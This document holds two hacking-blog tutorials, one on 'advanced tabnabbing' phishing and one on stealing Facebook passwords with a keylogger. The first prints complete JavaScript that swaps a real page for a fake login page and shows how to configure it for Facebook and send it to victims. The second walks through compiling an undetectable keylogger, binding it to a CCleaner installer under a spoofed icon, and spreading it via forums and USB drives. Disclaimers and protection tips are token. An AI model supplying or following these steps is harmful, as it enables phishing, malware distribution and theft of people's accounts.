Hacking Simplified

Hey friends, today i am going to How to Hack emails, social networking websites and other websites involving login information. The technique that i am going to teach you today is Advanced Tabnabbing. I have already explained what is basic tabnabbing today we will extend our knowledge base, i will explain things with practical example. So lets learn..

Advanced Tabnabbing Tutorial

I will explain this tutorial  using attack scenario and live example and how to protect yourself from such stuff.

Let consider a attack scenario:

1. A hacker say(me r.k) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details)

2. I (r.k) sends a copy of this web page to victim whose account or whatever i want to hack.

3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script.

4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages.

5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one.

6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him.

Here end's the attack scenario for advanced tabnabbing.

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do.  Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 10 years of imprisonment, if got caught in doing so.

Before coding Part lets first share tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing.

Follow below measure to protect yourself from Tabnabbing:

1. Always use anti-java script plugin's in your web browser that stops execution of malicious javascripts. For example: Noscript for Firefox etc.

2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.

3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL's.

4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.

5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.

That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..

Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.

First sample code for doing tabnabbing with the help of iframes:

 <!--
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: De$trUcTiVe M!ND (lokesh@hackingloops.com)
Website: http://www.hackingloops.com
Version:1.6
-->

<html>
<head><title></title></head>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body>

<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
var FAKE_PAGE_URL = "http://www.hackingloops.com"; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = "HackingLoops| Next Generation Hackers Portal"; //This sets the title of the fake page
var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon.  It will not switch or clear the "Real" favicon in IE.
var FAKE_FAVICON = "http://www.hackingloops.com/favicon.ico"; //Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";

//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
 BROWSER_TYPE = "Internet Explorer";
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;

//Set FAVICON
if(REAL_FAVICON){
 var link = document.createElement('link');
 link.type = 'image/x-icon';
 link.rel = 'shortcut icon';
 link.href = REAL_FAVICON;
 document.getElementsByTagName('head')[0].appendChild(link);
}

//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);

//Focus on the iframe (just in case the user doesn't click on it)
el_tabnab.focus();

//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
 el_tabnab.onblur = function(){
 TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
 }
 el_tabnab.onfocus= function(){
 if(TIMER) clearTimeout(TIMER);
 }
} else {
 setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}

function TabNabIt(){
 if(SWITCHED == "false"){
 //Redirect the iframe to FAKE_PAGE_URL
 el_tabnab.src=FAKE_PAGE_URL;
 //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
 if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;

 //Change the favicon -- This doesn't seem to work in IE
 if(BROWSER_TYPE != "Internet Explorer"){
 var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
 for (var i=0; i<links.length; i++) {
 var looplink = links[i];
 if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
 document.getElementsByTagName("head")[0].removeChild(looplink);
 }
 }
 var link = document.createElement("link");
 link.type = "image/x-icon";
 link.rel = "shortcut icon";
 link.href = FAKE_FAVICON;
 document.getElementsByTagName("head")[0].appendChild(link);
 }
 }
}
</script>

</body>
</html>

Now what you need to replace in this code to make it working say for Facebook:
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.

Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).

That's all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.
A comment of appreciation will do the work..

Hello friends today i will explain you how to hack the Facebook password or accounts remotely using keylogger. Its a 100% working hack and you can easily hack anyone's Facebook account or password using this hack. In this tutorial i will explain you how to hack Facebook and other passwords of any user using 100% FUD keylogger. The keylogger in this tutorial we will discuss is L33ts keylogger adn its 100% FUD(fully undetectable).

Hacking Facebook account is very easy and just requires not more than 10 minutes of work. Don't worry i will also tell you how to protect your facebook account or passwords from such hacks and hackers. But for this you must know how hackers hack your facebook account. So first i teach you how to hack facebook account remotely and then i will tell how to protect yourself from this.

NOTE: This tutorial is for Educational purposes only i.e. to make you aware how hackers hack your Facebook accounts. Please don't misuse it. I and Isoftdl is not responsible for any damage caused by you.

 So guys lets start hacking Facebook account or passwords....

Steps to hack Facebook account using Keylogger:

1. Creating the Keylogger Server to hack Facebook passwords.

2. Extracting the Icon from installer.

3. Bind the keylogger server with any software setup.

4. How to spread your keylogger or send it to your friends to hack their Facebook accounts or passwords.

Step 1. Creating the Keylogger Server

1. Download the keylogger.

Download

If above keylogger doesn't work then visit from this post: CLICK HERE

2. Extract the file, Now you will get two folders:

a. First one contains Keylogger and Binder

b. Second Contains resource hacker tool.( to extract the icons from installers).

3. Now open the Keylogger. It contains two files one for gmail email and other for password. For this create one test account on Gmail and enter it's details in this.

4. After entering email and password. Set the time interval usually set 3 mins i.e. after how much time you want to receive logs from the user.

5. Now click on send verification mail. This mail is to test that your keylogger is working correctly or not.

6. After you click this you will receive a confirmation mail on test account which will confirm that keylogger is working.

7. Now click on generate to set the mutex (any secret key to make your keylogger FUD) and then click on compile server.

8. Now save the file to desktop or any other location of your choice. Now your server is ready but it can be easily detected.

Step 2.: Extracting the Icon file from any installer(resource hacker)

1. Open the Resource hacker folder and open the reshacker file.

2. Now go to its menu and open any setup file. Suppose we want to attach our keylogger to Ccleaner setup file. So open the Ccleaner setup with resource hacker. 

3. Now in menu there is one action button click on it and then click save all resources.

4. Now save all the resources to desktop or any other location of your choice.

5. It consists of two files one is icon file and other is res file . We only need icon file, so you can delete the other file i.e res file.

6. Now we have Icon of installer file(as discussed above Ccleaner setup Icon).

Step 3: Bind the Keylogger server with any software

1. Now Go to keylogger folder and open the Binder.

2. Now Click on + button given below to add files.

3. Now add the keylogger server and the set up of software (i.e. in our case it's Ccleaner setup).

4. Now in menu of Binder, Go to Settings. There select the icon that we have generated in the previous step and set the location of output file as shown in figure.

5. Now again go to File's menu in Binder and click on Bind files.

6. Now your Binded keylogger is ready. Now you have to spread it or send it to the victim that is your friend.

Step4 : How to Spread Keylogger or send it to victim or friend

1. Now you have one Software setup file with keylogger attached with it.(In our case we have Ccleaner setup with keylogger attached with it.

2. Now Spread your keylogger through forums. You might be a member of various forums use them to spread your keylogger in form of software posts. You can use various software's to spread them that users frequently download.

3. Spread it through pendrives or USB hard drives. Suppose a friend asked you for a software give it the software that has keylogger attached with it. 

Note: you can also attach keylogger with images also. But that can be detectable by antivirus. So avoid such type of hacking.

So isn't that so easy to hack anyone's Facebook account in just few minutes.